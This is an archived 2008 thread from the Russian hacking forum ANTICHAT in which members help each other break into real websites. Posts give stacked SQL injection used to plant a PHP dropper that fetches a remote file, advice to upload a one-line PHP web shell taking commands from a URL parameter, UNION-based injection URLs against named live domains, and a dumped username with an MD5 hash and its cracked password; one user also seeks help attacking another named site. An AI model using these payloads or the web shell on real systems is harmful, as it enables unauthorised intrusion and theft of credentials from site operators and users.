ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

11.07.2008, 08:53
|
|
Новичок
Регистрация: 16.11.2007
Сообщений: 22
Провел на форуме: 147197
Репутация:
5
|
|
Нашел такое во трешение но опять споткнулся..
создать таблицу залить в неё пхп скрипт и потом вывести в в файл..
делаю http://ip/stat.php?type=melee';create table shell (code varchar(8000))--
потом insert into shell (code) values ('|code|')-- а вотут опять пишет на синтаксис, что тут не так?
Если вписывать INSERT into dbo..shell (code) values (123)-- без ковычек.. то в базу добавляется значение 123.. а пхп скрипт даже <?php phpinfo(); ?> вообще ни как=((?
Последний раз редактировалось 6u4yxa; 11.07.2008 в 09:03..
|
|
|

11.07.2008, 09:31
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме: 137918
Репутация:
56
|
|
Сообщение от 6u4yxa
Нашел такое во трешение но опять споткнулся..
создать таблицу залить в неё пхп скрипт и потом вывести в в файл..
делаю http://ip/stat.php?type=melee';create table shell (code varchar(8000))--
потом insert into shell (code) values ('|code|')-- а вотут опять пишет на синтаксис, что тут не так?
Если вписывать INSERT into dbo..shell (code) values (123)-- без ковычек.. то в базу добавляется значение 123.. а пхп скрипт даже <?php phpinfo(); ?> вообще ни как=((?
INSERT into dbo..shell (code) values (CHAR(65)+CHAR(67)....)
в ASCII переведи, если при конкатенации знаком "+" возникнут проблемы, то можно использовать функцию STUFF для конкатенации значений.
Последний раз редактировалось z3r0cool; 11.07.2008 в 09:43..
|
|
|

11.07.2008, 10:30
|
|
Новичок
Регистрация: 16.11.2007
Сообщений: 22
Провел на форуме: 147197
Репутация:
5
|
|
Вообещм разобрался пошел по пути создание базы запись в неё пхп скрипта и вывод в файл..
так как из за ковычек не как не хотел использовал http://www.motobit.com/util/binary-file-to-sql-hexstring.asp для перевода в хекс после этого запись в базу без проблем, но заливая туда скрипт <?php $a=file_get_contents('ip/123.txt'); $f=fopen('sqlsearch.php','a'); fputs($f,$a); fclose($f); ?> (ввиде хекса)- и после того как данные таблицы вывожу в файл ковычки автоматом почему то экранируются и получается <?php $a=file_get_contents(\'http://ip/123.txt\'); $f=fopen(\'sqlsearch.php\',\'a\'); fputs($f,$a); fclose($f); ?> после чего перейдя по ссылке сыпятся ошибки -
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in D:\AppServ\www\5.php on line 20
Warning: Unexpected character in input: ''' (ASCII=39) state=1 in D:\AppServ\www\5.php on line 20
как это обойти?
Parse error: syntax error, unexpected ':' in D:\AppServ\www\RF\5.php on line 20
|
|
|

11.07.2008, 11:36
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме: 10605912
Репутация:
4693
|
|
Сообщение от 6u4yxa
Warning: Unexpected character in input: ''' (ASCII=39) state=1 in D:\AppServ\www\5.php on line 20
как это обойти?
Parse error: syntax error, unexpected ':' in D:\AppServ\www\RF\5.php on line 20
Залей просто <?system($_GET[cmd]);?> через него и рули. (site/shell.php?cmd=dir) к примеру.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|

11.07.2008, 14:41
|
|
Новичок
Регистрация: 09.07.2008
Сообщений: 3
Провел на форуме: 11597
Репутация:
1
|
|
братья, простите что немного не потеме....
помогите сделать такую штуку: домен site.ru у него есть внутренняя страница, например про стройку, как сделать название страницы и в какой кодировке прописать ее в коде страницы, чтобы при переходе на данную страницу она имела такой вид: "www.site.ru/стройка" ???
|
|
|

11.07.2008, 19:40
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
http://www.nationalwellness.org/index.php?id=619&id_tier=1+or+1=(SELECT+TOP+1+TABL E_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
что тут не так ?
|
|
|

11.07.2008, 20:05
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от sabe
что тут не так ?
это Access
|
|
|

12.07.2008, 15:52
|
|
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
Провел на форуме: 1208132
Репутация:
63
|
|
Как можно расшарить вот этот сайт http://citywars.ru/?
ВРоде бы как защита слабая
(что то есть)
http://citywars.ru/photo/
... .ПОмоите что нибудь найти ->Игра начала работать только вчера
|
|
|

12.07.2008, 16:47
|
|
Новичок
Регистрация: 12.06.2008
Сообщений: 19
Провел на форуме: 70897
Репутация:
3
|
|
Нужна помощь с колонками!
http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,2,3,4,5,6,7/*
http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,@@version,3,4,5,6,7/* тут 5.0.33
http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,TABLE_NAME,3,4,5,6,7 FROM INFORMATION_SCHEMA.TABLES--
получаю имена таблиц:
<code>» CHARACTER_SETS (0) » COLLATIONS (0) » COLLATION_CHARACTER_SET_APPLICABILITY (0) » COLUMNS (0) » COLUMN_PRIVILEGES (0) » KEY_COLUMN_USAGE (0) » ROUTINES (0) » SCHEMATA (0) » SCHEMA_PRIVILEGES (0) » STATISTICS (0) » TABLES (0) » TABLE_CONSTRAINTS (0) » TABLE_PRIVILEGES (0) » TRIGGERS (0) » USER_PRIVILEGES (0) » VIEWS (0) » cat_body (0) » cat_level (0) » cat_rubrics (0) » cat_set (0) » righttable (0) » user_group (0) » userlog (0) » usertable (0) » variables (0)</code>
http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,column_name,3,4,5,6,7 from+information_schema.columns+where+table_name=0 x757365727461626c65+limit+1,1/*
http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,concat_ws(0x3a,usr_name,usr_passw ord),3,4,5,6,7+from+usertable+limit+1,1/*
получаю Денис:876993158b491f4626155b468ffb6edc
876993158b491f4626155b468ffb6edc=zerozero
но к админике не подходит! Почему?
В user_group нашол usr_id » grp_id но колонки с пасом не нашел!
|
|
|

12.07.2008, 16:54
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
masterBlack
Колонка usr_login
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|